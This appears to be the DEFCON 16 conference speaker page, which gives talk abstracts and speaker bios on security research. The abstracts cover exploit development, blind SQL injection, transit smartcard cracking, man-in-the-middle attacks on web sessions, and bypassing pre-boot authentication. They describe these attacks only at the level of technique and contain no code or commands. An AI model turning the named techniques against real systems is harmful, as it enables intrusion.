Speakers

You can now download audio and video of all of the talks from DEFCON 16 from these RSS feeds:

DEFCON 16 Speaker & Slides (video)
DEFCON 16 Slides (video)
DEFCON 16 Audio


Speaker List


Alpha by speaker

BackTrack Foo - From bug to 0day


Mati Aharoni
Owner, Offensive Security

As pentesters and hackers we often find the need to create our exploits on the fly. Doing this always presents a challenge. But one challenge took us to a new limit and a new level. We want to share the method with you. From Bug to 0Day will show the audience the process of fuzzing, locating the bug, using egghunters then figuring out to build a pure alphanumeric shellcode to exploit it.

This will truly be the most mind bending 60 mins you will spend in exploit development.

Mati is a network security professional, currently working with various Military and Government agencies as well as private sector businesses. His day to day work involves vulnerability research, exploit development and whitebox / blackbox Penetration Testing.

Mati is most know for his role in creating the award winning, internationally acclaimed linux pentesting distro, BackTrack. As well as his lead role in creating the hottest security training school in the international market today, "Offensive Security". This focused, intense school hones the skills for security professionals by teaching them the tools and methodologies popular in the market. Mati has been training security and hacking courses for over 10 years and is actively involved in the security arena.

Top of page

Autoimmunity disorder in Wireless LAN


Md Sohail Ahmad
Senior Wireless Security Researcher, Airtight Networks Inc.
JVR Murthy
Senior Wireless Security Researcher, Airtight Networks Inc.
Amit Vartak
Senior Wireless Security Researcher, Airtight Networks Inc.

An autoimmune disorder is a condition that occurs when the immune system mistakenly attacks and destroys healthy body tissue. This presentation is about discovery of autoimmunity disorder in select open source and commercial 802.11 AP implementations. By sending specially crafted packets, it is possible to trigger autoimmunity disorder and cause AP to turn hostile against its own clients. Eight examples of autoimmune disorder will be demonstrated.

Autoimmunity disorder can be exploited to craft new DoS attacks. Although 802.11w promises immunity from DoS attacks, we show that autoimmunity disorder leaves a door open through which DoS attacks can still be launched. One example of DoS attack against MFP(11w) will be demonstrated.

Md Sohail Ahmad is a wireless security researcher in AirTight Networks. Mr Ahmad possesses strong background in secure driver development, protocol development, and open source tool development. He is currently working on mitigation of various security aspects of IEEE802.11w and IEEE 802.11n standards and in its implementations.

Prior to this, he has also demonstrated the more potent form of Evil Twin Attack called "Multipot" in Defcon-15. He has discovered "Caffe Latte" attack which was presented in ToorCon9, which is about retrieving WEP key from an isolated client in the absence of its authorized access point.

Top of page

Time-Based Blind SQL Injection using heavy queries:


A practical approach for MS SQL Server, MS Access, Oracle and MySQL databases and Marathon Tool


Chema Alonso
Microsoft MVP Windows Security,Informática64
José Parada
Microsoft IT Pro Evangelist,Microsoft

This presentation describes how attackers could take advantage of SQL Injection vulnerabilities using time-based blind SQL injection. The goal is to stress the importance of establishing secure development best practices for Web applications and not only to entrust the site security to the perimeter defenses. This article shows exploitation examples for some versions of Microsoft SQL Server, Oracle DB Engine,MySQL and Microsoft Access database engines, nevertheless the presented technique is applicable to any other database product in the market. This work shows a NEW POC Tool.

Chema Alonso is a Computer Engineer by the Rey Juan Carlos University and System Engineer by the Politécnica University of Madrid. He has been working as security consultant last six years and had been awarded as Microsoft Most Valuable Professional from 2005 to present time. He is a Microsoft frequent speaker in Security Conferences. He writes monthly in several Spanish Technical Magazines as "Windows TI Magazine", "PC Actual" or "Hackin9". He is currently working on his PhD thesis under the direction of Dr. Antonio Guzmán and Dr. Marta Beltran. Recently spoke at BH Europe 2008 about LDAP Injection & Blind LDAP Injection attacks. More info:http://mvp.support.microsoft.com/gp/mvpInsider_2006-08

José Parada is an IT Pro Evangelist in Microsoft. He is a very famous speaker in Spanish conferences about IT Infrastructures, Microsoft Technologies and Security. He has been working in the Microsoft Technet Program from 2005 delivering conferences, webcasts and technical information.

Top of page

The Anatomy of a Subway Hack:


Breaking Crypto RFID's and Magstripes of Ticketing Systems


Zack Anderson
Student, MIT
RJ Ryan
Student, MIT
Alessandro Chiesa
Student, MIT

In this talk we go over weaknesses in common subway fare collection systems. We focus on the Boston T subway, and show how we reverse engineered the data on magstripe card, we present several attacks to completely break the CharlieCard, a MIFARE Classic smartcard used in many subways around the world, and we discuss physical security problems. We will discuss practical brute force attacks using FPGAs and how to use software-radio to read RFID cards. We survey 'human factors' that lead to weaknesses in the system, and we present a novel new method of hacking WiFi: WARCARTING. We will release several open source tools we wrote in the process of researching these attacks. With live demos, we will demonstrate how we broke these systems.

Zack Anderson is studying electrical engineering and computer science at MIT. He is an avid hardware and software hacker, and has built several systems such as an autonomous vehicle for the DARPA Grand Challenge. Zack is especially interested in the security of embedded systems and wireless communications. He has experience building and breaking CDMA cellular systems and RFID. Zack has worked for a security/intelligence firm, and has multiple patents pending. He enjoys building systems as much as he enjoys breaking them.

RJ Ryan is researcher at MIT. His longtime passion for security has resulted in a number of hacks and projects, including a steganographic cryptography protocol. RJ works on a number of technical projects ranging from computer security to operating systems, distributed computation, compilers, and computer graphics. He enjoys learning how things work, and how to make things work for him.

Alessandro Chiesa is a Junior at MIT double majoring in Theoretical Mathematics and in Electrical Engineering and Computer Science. Born and raised in Varese,Italy, he came to MIT with interests in computational algebraic geometry, machine learning, cryptography, and systems security. He has authored papers such as "Generalizing Regev's Cryptosystem", which proposes a new cryptosystem based on shortest vector problems in cyclotomic fields. He is currently working with Oracle's Database Security group.

Top of page

Digital Security: a Risky Business


Ian O. Angell
Professor of Information Systems. London School of Economics

In this talk Professor Angell will take the devil’s advocate position, warning that computer technology is part of the problem as well as of the solution. The belief system at the core of computerization is positivist and/or statistical, and that itself leads to risk. The mixture of computers and human activity systems spawns bureaucracy and systemic risk, which can throw up singularities that defy any positivist/statistical analysis. Using black humour, Angell discusses the thin line between the utility of computers and the hazard of chaotic feedback, and ends with some advice on how to survive and prosper amongst all this complexity.

Ian Angell has been Professor of Information Systems at the London School of Economics since 1986. Prior to that he researched and taught Computer Science at Royal Holloway College, and University College London.

Angell has very radical and constructive views on his subject, and is very critical of what he calls the pseudo-science of academic Information Systems. He has gained a certain notoriety worldwide for his aggressive polemics against the inappropriate use of artificial intelligence and so-called knowledge management, and against the hyperbole surrounding e-commerce.

His main research work concentrates on organizational and national I.T. policies, on strategic information systems, and on computers and risk (both opportunities and hazards), particularly the systemic risks inherent in all socio-technical systems and the security threats posed to organisations by the rapidly diffusing international information infrastructure.

Top of page

VulnCatcher: Fun with Vtrace and Programmatic Debugging



atlas

Countless hours are spent researching vulnerabilities in proprietary and open source software for each bug found. Many indicators of potential vulnerabilities are visible both in the disassembly and debugging, if you know what to look for. How much can be automated? VulnCatcher illustrates the power of programmatic debugging using the VTRACE libraries for cross-platform debugging.

atlas a disciple of the illustrious Skodo, has a history in programming, systems support, telecom, security, and reverse engineering. His introduction to the hard-core hacking world was through dc13's CTF Qualifiers. Captain of two-time CTF-winner "1@stplace" and individual winner of CTF-2005, atlas has released hacking tools and toolkits such as disass, atlasutils, and is co-maintainer of the python library for x86 disassembly: libdisassemble.

Top of page

Pen-Testing is Dead, Long Live the Pen Test


Taylor Banks
Security Evangelist
Carric
DEFCON Goon

This talk explores the death and subsequent re-birth of the penetration test. Comprised of conclusions drawn from the collective experiences of two seasoned pen-testers, our talk is filled with facts, fun and rhetoric. We will describe the landscape, the problems, and offer real solutions.

In our talk, we will explore the problems with modern-day pen-tests and pen-testers, and ways to stand out amongst the frauds selling their lackluster vuln-scan services under the guise of a true penetration test.

We discuss penetration tests that are overly tool-driven and/or lacking in methodology as well as pen-testers who lack the experience and creativity to identify the architectural problems that real attackers frequently exploit.

Along the way, we'll discuss the difficulties faced by real penetration testers and complement these with real-world war-stories to provide both context and comic relief.

Most importantly, we'll discuss how to solve these problems, through contributions to open methodologies, transparency in process, and shifts in technological paradigms. We'll tell you how to deal with the latest technologies, even those that change day-by-day. For those that take penetration testing seriously, this talk will be a fun, informative and enlightening presentation on the things we need to do to keep pen-testing worthwhile. Attendees will learn how to perform pentests accurately and obtain compelling and valuable results that ensure real return on investment for their clients.

Taylor Banks is a security evangelist and privacy pundit with over 15 years in the information technology industry, the last 10 focused exclusively on information security and privacy. Since 1998, he has been designing, implementing, teaching and managing secure information systems for Federal Government, US Military, private universities and public companies, from start-ups to Fortune 100. Taylor, aka "dr.kaos," is also the PoC for the Atlanta DEFCON Group (DC404), and in 2005 founded "kaos theory security research," creators of the Anonym.OS LiveCD. Between 1999 and 2002, Taylor worked at SecureIT (later acquired by VeriSign) providing CheckPoint, Nokia, NAI, Web Security and Applied Hacking training to hundreds of enterprise customers, as well as review, design and development of secure network architecture and related security policies for numerous Fortune 500 organizations. During that time, Mr. Banks devised testing methodologies and audit procedures, and helped found the VeriSign FIRE team to provide penetration tests and security audits for internal departments and enterprise customers. In 2003, Taylor trained the US Marine Corps 13-member Computer Emergency Response Team (MARCERT) to perform penetration tests and security audits to assess and improve the security of their own military and public networks. The MARCERT team subsequently entered DEFCON's prestigious CTF competition, ranking 3rd at the conclusion of the DEFCON XI conference. Since 2007, Taylor has been focused on virtualization and its impact on enterprise information security.

Carric is a Goon. Buy him beer.

Top of page

Owning the Users with The Middler


Jay Beale
Senior Security Consultant and Co-Founder, Intelguardians Network Intelligence, Inc.

This talk introduces a new open source, plugin-extensible attack tool for exploiting web applications that use cleartext HTTP, if only to redirect the user to the HTTPS site. We'll demonstrate attacks on online banking as well as Gmail, LinkedIn, LiveJournal and Facebook. We'll also compromise computers and an iPhone by subverting their software installation and update process. We'll inject Javascript into browser sessions and demonstrate CSRF attacks.

Our new tool, The Middler, automates these attacks to make exploiting every active user on your computer's network brain-dead easy and scalable. It has an interactive mode, but also has a fire-and-forget mode that can perform these attacks automatically without interaction. Written in Ruby, this tool is easy to both extend and add into other tools.

Jay Beale is an information security specialist, well known for his work on threat avoidance and mitigation technology. He's written two of the most popular security hardening tools: Bastille UNIX, a system lockdown and audit tool that introduced a vital security-training component, and the Center for Internet Security's Unix Scoring Tool. Both are used worldwide throughout private industry and government. Through Bastille and his work with the Center, Jay has provided leadership in the Linux system hardening space,participating in efforts to set, audit, and implement standards for Linux/Unix security within industry and government. Jay also contributed to the OVAL project and the Honeynet Project.

Jay has served as an invited speaker at a variety of conferences worldwide as well as government symposia. He's written for Information Security Magazine, SecurityFocus, and SecurityPortal. Jay has co-authored or edited nine books in the Information Security space. Six of these make up his Open Source Security Series, while two are technical works of fiction in the "Stealing the Network" series. Jay is a security analyst and managing partner at Intelguardians, where he gets to work with brilliant people on topics ranging from Page 4 application penetration to virtual machine escape. Prior to this, Jay served as the Security Team Director for MandrakeSoft, helping set company strategy, design security products, and pushing security into the then third largest retail Linux distribution.

Top of page

They're Hacking Our Clients! Introducing Free Client-side Intrusion Prevention


Jay Beale
Senior Security Consultant and Co-Founder, Intelguardians Network Intelligence, Inc.

In the face of far stronger firewall and IPS-protected perimeters,attackers are compromising far more systems by hacking our web browsers, e-mail clients, and office document tools. Unfortunately,vulnerability assessment practices still focus on checking listening services, even on workstations. Detecting vulnerable clients is left for patch management tools, which aren't in consistent or wide enough use. Even when organizations are able to invest the time and money in a patch management system, a series of critical problems keeps the botnet builders in business.This talk, by Bastille UNIX creator Jay Beale, introduces a free tool to detect vulnerable clients and keep them out of the botnets.

Jay Beale is an information security specialist, well known for his work on threat avoidance and mitigation technology. He's written two of the most popular security hardening tools: Bastille UNIX, a system lockdown and audit tool that introduced a vital security-training component, and the Center for Internet Security's Unix Scoring Tool. Both are used worldwide throughout private industry and government. Through Bastille and his work with the Center, Jay has provided leadership in the Linux system hardening space, participating in efforts to set, audit, and implement standards for Linux/Unix security within industry and government. Jay also contributed to the OVAL project and the Honeynet Project. Jay has served as an invited speaker at a variety of conferences worldwide as well as government symposia. He's written for Information Security Magazine, SecurityFocus, and SecurityPortal. Jay has co-authored or edited nine books in the Information Security space. Six of these make up his Open Source Security Series, while two are technical works of fiction in the "Stealing the Network" series.

Jay is a security analyst and managing partner at Intelguardians, where he gets to work with brilliant people on topics ranging from application penetration to virtual machine escape. Prior to this, Jay served as the Security Team Director for MandrakeSoft, helping set company strategy, design security products, and pushing security into the then third largest retail Linux distribution.

Top of page

Predictable RNG in the vulnerable Debian OpenSSL package, the What and the How


Luciano Bello
Engineer (Information Systems),CITEFA/Si6
Maximiliano Bertacchini
Researcher, CITEFA/Si6

Recently, the Debian project announced an OpenSSL package vulnerability which they had been distributing for the last two years. This bug makes the PRNG predictable, affecting the keys generated by openssl and every other system that uses libssl (eg. openssh, openvpn). We will talk about this bug, its discovery and publication, its consequences, and exploitation. As well, we will demonstrate some exploitation tools.

Luciano Bello is an Engineer (Information Systems) and works as a researcher at CITEFA's Si6 Information Security Labs in Buenos Aires, Argentina. He has been a Debian Developer since 2007.

Maximiliano Bertacchini is a PhD student in Computer Engineering at ITBA (Technological Institute of Buenos Aires). He is a researcher at CITEFA's Si6 Information Security Labs in Buenos Aires, Argentina.

Top of page

When Lawyers Attack! Dealing with the New Rules of Electronic Discovery


John Benson "jur1st"
Electronic Discovery Consultant

The legal community is slowly accepting that the changes to the Federal rules which change the law's approach to electronic evidence are not going away. Vendors are clamoring to sell their e-discovery "solutions" to law firms and corporations alike, often taking advantage of the uncertainty that comes with such sweeping changes to the law.

The changes to the Federal Rules change the way in which individuals and organizations approach their data much in the same way Sarbanes- Oxley has over the past few years. Instead of merely creating compliance headaches for security professionals, however, these changes take data security out of the hands of those charged to protect it and spread data to the wind.

More frightening for individuals doing security research is the fact that these rules apply to the one man research operation as the multimillion dollar conglomerate in the same way.

This talk outlines how the electronic discovery process works, why it is costing corporations millions of dollars (but doesn't have to) and will empower attendees with the knowledge they need to deal with this new legal environment.

John Benson currently works as an electronic discovery consultant at a large Kansas City law firm. A graduate of the University of Missouri from both Columbia and Kansas City campuses, he is a member of the Missouri Bar Association and serves as the chairman of the Kansas City Metropolitan Bar Association Computer Law and Technology Committee. He has taught law, ethics and (oddly enough) finance as an adjunct professor at The Colorado Technical University. In 2008 he founded the Cowtown Computer Congress, a hackerspace and umbrella organization for the advancement of user-driven technology activities in Kansas City. He has presented at hacker cons around the country including LayerOne, Pumpcon, Shmoocon and DEFCON. He can be found on the DEFCON boards and assisting with radio communications at DEFCON. His website can be found at http://www.john-benson.com.

Top of page

The emergence (and use) of Open Source Warfare


Peter Berghammer
CEO, Copernio Holding Company

The presentation will deal briefly (20 minutes) with the concepts surrounding Open Source Warfare (OSW) and broader adoption for use not only within the context of war fighting, but also its uses within the political arena in order to influence opinion.

The presentation will only deal with publicly available data, couple with real world deployment examples. It WILL NOT contain any type of classified data or anything that can be construed as such.

OSW has become a highly lucrative area that covers topics such as computer security, shaping of potential battlefields and populations, and actual in the field uses of mutated electronics devices such as microwave ovens, model rockets, remote controlled aircraft as well as computer based command and control protocols. What is so particularly interesting in this presentation (as well as the field itself) is how under funded and ill-equipped insurgency (and counter insurgency) groups can make use of off-the-shelf technology to fight against vastly better funded armies. It will also examine communications methods of these groups - and how they approach not only Internet style communication (and in some cases set up their own superior communications networks) but also how they approach communications security.

Peter Berghammer CEO of Copernio (founded 2001), is an accomplished aerospace, semiconductor and optical disc industry professional. Though best known for his marketing acumen, he also possesses a thorough understanding and appreciation for strategic alliances, acquisitions, and mergers. He is noted for the rapid expansion of The Copernio Holding Company ñ taking it from simply an IT solutions provider to an organization with divisions handling consulting, research, warehousing & logistics. Under his tenure, Copernio has expanded from a single location to an international corporation with warehouses and offices in over eighteen countries. His goal however has always remained the same: to assist clients achieve their business objectives through the intelligent and efficient use of information technology and infrastructure. The Copernio Holding Company is headquartered in Huntington Beach, CA and Brussels, BE.

Top of page

What To Do When Your Data Winds Up Where It Shouldn't


Don Blumenthal
DMB & Associates

Stories about the loss of sensitive data are becoming more common, and an untold number of others probably are not known because they were not covered by law or did not get the attention of regulators. A loss may happen when data is stolen or simply lost, or when a system is breached. Existing federal and state laws cover specific industries and prescribe particular responses, but pending legislative proposals threaten to expand coverage significantly. This presentation will discuss the relevant federal and state laws concerning disclosure of sensitive information. In addition, it will explore the elements of a plan for responding to a data loss and the considerations that occur should that plan have to be put into use. These plans, elements, and considerations are critical for addressing a data loss and for dealing with such disparate groups as regulators, the public, employees, and shareholders after your, and their, data is gone.

Don Blumenthal is a professional with over 20 years proven experience in technology, law, and policy, and has worked on data breach matters from both the law enforcement and private sector sides. He is a consultant and attorney based in Ann Arbor, MI, specializing in data security and privacy issues, as well as other technology-related matters such as electronic discovery, spam, malware, and Internet evidence development. He also is a Senior Principal with Global Cyber Risk, LLC, of Washington, DC. In addition, Mr. Blumenthal is an adjunct professor in the University of Michigan School of Information and serves as a legal affairs SME for the Centre for Assurance Studies, a NSA Center of Academic Excellence in Information Assurance Education at the University of Detroit Mercy.

Top of page

Working with Law Enforcement


Don M. Blumenthal
DMB & Associates

Security-related laws and regulations, with parallel privacy measures, are assuming an ever-expanding role in American society. As a result, the likelihood that an organization will receive a call, visit, subpoena, or letter from a law enforcement agency is constantly increasing. This program will address issues related to addressing these contacts. It will explore relevant legal questions but also the real world processes and considerations that should go into protecting private sector interests, and even lessening the burden of government inquiries. In addition, it will discuss considerations concerning proactive fostering of relationships with law enforcement to mutual benefit.

Don M. Blumenthal is a professional with over 20 years proven experience in technology, law, and policy. He is a consultant and attorney based in Ann Arbor, MI, specializing in data security and privacy issues, as well as other technology-related matters such as electronic discovery, spam, malware, and Internet evidence development. He also is a Senior Principal with Global Cyber Risk, LLC, of Washington, DC. In addition, Mr. Blumenthal is an adjunct professor in the University of Michigan School of Information and serves as a legal affairs SME for the Centre for Assurance Studies, a NSA Center of Academic Excellence in Information Assurance Education at the University of Detroit Mercy.

Top of page

Generic, Decentralized, Unstoppable Anonymity: The Phantom Protocol


Magnus Bråding
Security Researcher, Fortego Security

Recent years, and especially this past year, have seen a notable upswing in developments toward anti online privacy around the world, primarily in the form of draconian surveillance and censorship laws (both passed and attempted) and ISPs being pressured into individually acting as both police and informants for commercial interests. Once such first steps are taken, it's of course also of huge concern how these newly created possibilities could be used outside of their originally stated bounds, and what the future of such developments may be.

There are no signs of this trend being broken anytime soon, and combined with the ever growing online migration of everything in general, and privacy sensitive activities in particular (like e.g. voting and all kinds of discussions and other personal groupings), this will in turn unavoidably lead to a huge demand for online anonymization tools and similar privacy means.

If not designed carefully though, such anonymization tools will yet again be easy targets for additional draconian legislation and directed (il)legal pressure from big commercial interests. Thus, a good, robust and theoretically secure design for an anonymization protocol and infrastructure is needed, which is exactly what is set out to be done with this project.

What is presented in this talk is the design of a protocol and complete system for anonymization, intended as a candidate for a free, open, community owned, de facto anonymization standard, vastly improving on existing solutions such as TOR, and having the following important main properties and design goals:

  1. Completely decentralized.
    - No critical or weak points to attack or put (il)legal pressure on.

  2. Maximum resistance against all kinds of DoS attacks.
    - Direct technical destructive attacks will practically be the only possible way to even attempt to stop it.

  3. Theoretically secure anonymization.
    - Probabilistic methods (contrary to deterministic methods) must be used in a completely decentralized design like this, where no other peer can be trusted, so focus is put on optimizing these methods.

  4. Theoretically secure end-to-end transport encryption.
    - This is simple in itself, but still important in the context of anonymization.

  5. Completely (virtually) isolated from the "normal" Internet.
    - No one should have to worry about crimes being perpetrated from their own IP address.

  6. Maximum protection against identification of protocol usage through traffic analysis.
    - You never know what the next draconian law might be.

  7. Capable of handling larger data volumes, with acceptable throughput.
    - Most existing anonymization solutions are practically unusable for (or even prohibit) larger data volumes.

  8. Generic and well-abstracted design, compatible with all new and existing network enabled software.
    - Software application developer participation should not be needed, it should be easy to apply the anonymization to both new and already existing products like e.g. web browsers and file transfer software.

The Phantom protocol has been designed to meet all these requirements, and will be presented in this talk.

Magnus Bråding is a security researcher at (and co-founder of) Swedish IT security specialist firm Fortego Security.

His life-long passion for reversing, understanding and ultimately controlling any and all aspects and processes around him has resulted in, among other things, a solid security background with more than 15 years worth of experience within the fields of reverse engineering and network security and forensics. He is also a central contributor, maintainer and driving force behind one of the world's most long-running and well-known online reverse engineering resources.

Top of page

Buying Time - What is your Data Worth?


(A generalized Solution to distributed Brute Force attacks)


Adam Bregenzer
Security Researcher

Brute Force attacks are often marginalized as a user issue or discounted as a non-issue because of sufficient password complexity. Because rainbow tables have provided a re-invigoration of this type of attack, maintaining password security is simply not enough. In this session, I will be releasing a framework for easily creating a brute force attack tool that is both multithreaded and distributed across multiple machines. As computing power continues to grow along with the ability to rent cycles and storage space, it becomes reasonable to add a money-time trade-off to brute force and dictionary attacks. Distributed computing combined with rainbow tables mean brute force attacks can now be very effective. I will present a version of a popular brute force tool which I modified to increase its speed by several orders of magnitude. Additionally I will demonstrate how to adopt an existing tool to utilize this framework.

Adam Bregenzer is actively involved in technology research and development. As a charter member of the kaos.theory computer security consortium, he developed and presented various projects to the Information Security industry at a number of national conventions. He was a contributing author to the O'Reilly Series of programming manuals. He developed a number of nationally recognized websites and projects receiving worldwide press from Wired News, the New York Times, The Register, the Boston Globe, and the LA Times.

Top of page

ModScan: A SCADA MODBUS Network Scanner


Mark Bristow
Security Researcher

ModScan is a new tool designed to map a SCADA MODBUS TCP based network. The tool is written in python for portability and can be used on virtually any system with few required libraries. The presentation includes a demonstration of the ModScan scanner as well as a rundown of the various features and modes available. I will also be covering the MODBUS and MODBUS TCP protocols including packet construction and communication flows. A brief SCADA primer is also included for the education of the audience.

Mark is a Certified SCADA Security Architect with three years experience in the information assurance business. He has done research and analysis of the SCADA MODBUS and MODBUS TCP protocol leading to the development of his ModScan tool. In addition to his SCADA work, Mark is a Web Application Security penetration tester and consultant. He regularly speaks at local events in DC and VA and frequently conducts training on the subject. Mark received his bachelors degree in Computer Engineering from The Pennsylvania State University.

Top of page

Deciphering Captcha


Michael Brooks
Security Engineer, Fruition Security

This presentation will detail two methods of breaking captcha. One uses RainbowCrack to break a visual captcha. The other uses fuzzy logic to break an audio captcha. Both methods are 100% effective. These are real attacks that affect real world software: CVE-2008-2020 CVE-2008-2019. Exploit code is available to the public

Michael Brooks is a puzzle master. Some people like Sudoku, but Michael likes hacking. Michael is a Computer Science student at Northern Arizona University. Michael has worked in web application development, penetration testing as well as other forms of software quality control. Currently he works in the finical industry for https://www.paythentrade.com/ as a security engineer. Michael has recently started the website: http://www.rooksecurity.com/ . As you can see Michael has published a wide range of real world attacks against web applications.

Exploit code written by Michael:
http://milw0rm.com/author/677

CVE's from Michael:
CVE-2008-2019,CVE-2008-2020,CVE-2008-2043,CVE-2007-6471,CVE-2007-6459,CVE-2007-6458,CVE-2007-0134,CVE-2007-0132,
CVE-2007-0130,CVE-2006-6781,CVE-2006-3208,CVE-2006-3207,CVE-2006-3206,CVE-2006-3205,CVE-2006-3204,CVE-2006-3203.

Top of page

CSRF Bouncing†


Michael Brooks
Security Engineer, Fruition Security

In this talk I will be discussing Exploit Chaining in Web Applications and CSRF. I will discuss the surface area problem in security and how to gain access to a l attack surface using CSRF. I will detail the process I used to find and exploit a vulnerability in a real world application. I will discuss how to have fun in a sandbox and defeating CSRF protection. I will also talk about the defenses against these attacks. I will be releasing an 0-day exploit and provide a machine for the audience to break into.

Michael Brooks is a security researcher engaged in exploit development. Michael is interested in real world attacks as well as new methods of exploitation. He enjoy finding flaws in applications and writing exploit code. http://milw0rm.com/author/677

CVE's from Michael:
CVE-2008-2019,CVE-2008-2020,CVE-2008-2043,CVE-2007-6471,CVE-2007-6459,CVE-2007-6458,CVE-2007-0134,CVE-2007-0132,
CVE-2007-0130,CVE-2006-6781,CVE-2006-3208,CVE-2006-3207,CVE-2006-3206,CVE-2006-3205,CVE-2006-3204,CVE-2006-3203.

Michael is a computer science student at Northern Arizona University. Michael has successfully worked in penetration testing as well as software quality control. Currently he works for http://fruitionsecurity.com/ as a security engineer and recently started the website: http://www.rooksecurity.com/

Top of page

Bypassing pre-boot authentication passwords


by instrumenting the BIOS keyboard buffer (practical low level attacks against x86 pre-boot authentication software)


Jonanthan Brossard
Lead Security Researcher, Iviz

Pre-boot authentication software, in particular full hard disk encryption software, play a key role in preventing information theft. In this paper, we present a new class of vulnerability affecting multiple high value pre-boot authentication software, including the latest Microsoft disk encryption technology : Microsoft Vista's Bitlocker, with TPM chip enabled. Because Pre-boot authentication software programmers commonly make wrong assumptions about the inner workings of the BIOS interruptions responsible for handling keyboard input, they typically use the BIOS API without flushing or initializing the BIOS internal keyboard buffer. Therefore, any user input including plain text passwords remains in memory at a given physical location. In this article, we first present a detailed analysis of this new class of vulnerability and generic exploits for Windows and Unix platforms under x86 architectures. Unlike current academic research aiming at extracting information from the RAM, our practical methodology does not require any physical access to the computer to extract plain text passwords from the physical memory. In a second part, we will present how this information leakage combined with usage of the BIOS API without careful initialization of the BIOS keyboard buffer can lead to computer reboot without console access and full security bypass of the pre-boot authentication pin if an attacker has enough privileges to modify the bootloader. Other related work include information leakage from CPU caches, reading physical memory thanks to firewire and switching CPU modes.

Jonanthan Brossard is French,and has recently moved to India to build and lead the research and exploitation team of Iviz (http://www.ivizindia.com/iviz/aboutus.html). Jonathan's daily activities involve exploit writing, reverse engineering, code auditing and research in disruptive low level hacking methodologies.

Before moving to India, Jonathan worked as a security researcher in the Defense area in France for Sagem Defense Securite, where he designed and patented new protection schemes for protecting applications against reverse engineering under GNU/Linux architectures. Prior to that position, He has also worked in French pioneer pentesting consulting company Edelweb. Therefore he has experience with both ends of the security industry...

During college, Jonathan was employed as a network administrator of one of the major school network in France, which gave him a strong taste for networking and network security.

Jonathan started getting interested with low level security issues more than 10 years ago, when he learnt x86 asm under MS-DOS. Many things have changed since those good old times of real mode OSes, but there is still room for surprises... Low level attacks involving deep knowledge of computers internals are not dead... just read the paper ;) Jonathan would also like to mention his ties to excellent security research groups such as pulltheplug.org and blacksecurity.org :this is where public information ends and where security research begins...

Top of page

Grendel-Scan: A new web application scanning tool


David Byrne
Security Consultant, Trustwave
Eric Duprey
Senior Security Engineer, Dish Network

While commercial web application scanners have been available for quite a while, the selection of open source tools has been limited. Grendel-Scan is a new tool that aims to provide in-depth application assessment. Written entirely in Java and featuring an easy to use GUI, the tool is intended to be useful to a wide variety of technical backgrounds: from IT security managers, to experienced penetration testers.

Grendel-Scan can test for authentication and authorization bypass, SQL injection (blind and error-based), XSS, CRLF injection / response splitting, session key strength, session fixation, file/directory/backup enumeration, directory indexing, web server mis-configuration, and other vulnerabilities. Exploration of the web application can be accomplished through an embedded proxy server, via automated spidering, or search engine reconnaissance.

The accuracy of the testing is increased by powerful features such as automatic detection and correction of logged out sessions, heuristic file-not-found detection, and an embedded HTML DOM parser and JavaScript engine for full page analysis. Grendel-Scan was architected with extensibility in mind. Powerful libraries offering features such as input/output tracing, session tracking, or HTML DOM comparisons make the development of new test modules much easier.

The presentation will feature an overview of the application's design, results of comparative analysis against similar tools, and a live demonstration of the tool using a real application (not an intentionally vulnerable app).

David Byrne is a penetration tester in Trustwave's SpiderLabs division. David was also the founder of the Denver chapter of the Open Web Application Security Project (OWASP).

Eric Duprey is a Senior Security Engineer with Dish Network and leader of the Denver chapter of OWASP.

Top of page

Building a Real Session Layer


D.J. Capelis

It's past time for a session layer. It's time to replace port knocking with a real authentication framework. It's time to do what DNS did with IP addresses to port numbers. It's time to run services over NATs, eliminate the need for vhosts in your webserver and provide optional transparent encryption for any client who wants it. In this talk, we'll do that and a couple other tricks... within the framework of a little-known RFC that was written almost 2 decades ago.

D.J. Capelis spends his time at University of California, San Diego eating pizza. A portion of the remaining time is dedicated to research on building more secure computer systems. His latest research areas include building trusted platforms that aren't evil, looking for the next hot thing among old ideas and raining on the parades of people who think virtualization is a wonderful idea for production systems. He yearns for a time when XML was a scary dream, SPRITE would transparently migrate your processes between machines and real programmers had an inexplicable hatred for quiche.

Top of page

Hacking E.S.P.


Joe Cicero
Network Specialist Instructor, Northeast Wisconsin Technical College
Michael Vieau
Independent security researcher

Have you gone to school? Are you going to school? Do you work at a school? How do you prove you went to a particular high school, college or university? FACT: Educational institutions MUST keep your personal/confidential information. Therefore, your personal/confidential information might be at risk! This presentation will be about typical software packages found at educational institutions and their vulnerabilities. We will use known attacks to show new vulnerabilities in several typical educational software packages. The presentation will focus on the vulnerabilities, what tools were used to find them, and why successfully exploiting a weak system will allow you to gain access to a secure system.

Joe Cicero is currently a Network Specialist Instructor for Northeast Wisconsin Technical College, he specializes in teaching Linux, Network Security, and Computer Forensics Courses. He is originally from Green Bay and in 1985 he joined the Marines. His final duty assignment was as the Operations Chief for Tactical Warfare Simulations Evaluations Analyses Systems (TWSEAS) where he traveled the world conducting training through use of computer simulations.

Michael Vieau is an independent security researcher located in United States where he conducts security assessments & penetration tests on new and existing technology for various customers (and sometimes just for fun). His main focus is on *NIX security, mobile devices, and wireless security. He comes from a wide technical background ranging from network infrastructure, to programming, instructing, & of course security.

Top of page

Hacking Desire


Ian Clarke
CEO, Uprizer Labs LLC & Coordinator, The Freenet Project

What do you want? This is the question that almost every commercial organization on the planet thinks they have an answer to, but do they? Figuring out what people want is essentially a process of reverse engineering human needs, desire, and preference. It turns out that hackers are particularly adept at reverse engineering, so what happened when we applied our skills to reverse engineering what you, and everyone else, wants?

This talk will describe how we constructed a model for how the human mind decides what it wants, and then customize this model to imitate particular individuals, and thus anticipate specifically what they want. I will demonstrate the effectiveness of this approach on guessing how much particular users will like particular movies, based on the feedback they've given to a popular movie rental website. I'll also discuss flaws in how "collaborative filters" are designed, and measured, and explain why our approach is an improvement.

This talk will discuss sophisticated ideas in machine learning and artificial intelligence, but no background in these topics will be required for attendees.

Ian Clarke is a Computer Scientist and Entrepreneur, with a track record of both technical and business innovation, and an outspoken thinker and activist on issues relating to freedom of speech, intellectual property law, and technology. Ian is the founder and coordinator of the Freenet Project; designed to allow true freedom of communication, Freenet was the first decentralized anonymous peer-to-peer network, and a precursor of the "distributed hashtable" data structure. Ian has also founded a number of innovative and diverse commercial ventures, including Revver, the first online video website to share revenue with video creators, and Thoof, a collaboratively generated personalized news website. Ian has a degree in Artificial Intelligence and Computer Science from Edinburgh University, Scotland.

Top of page

Climbing Everest: An Insider's Look at one state's Voting Systems


Sandy Clark "Mouse"
University of Pennsylvania

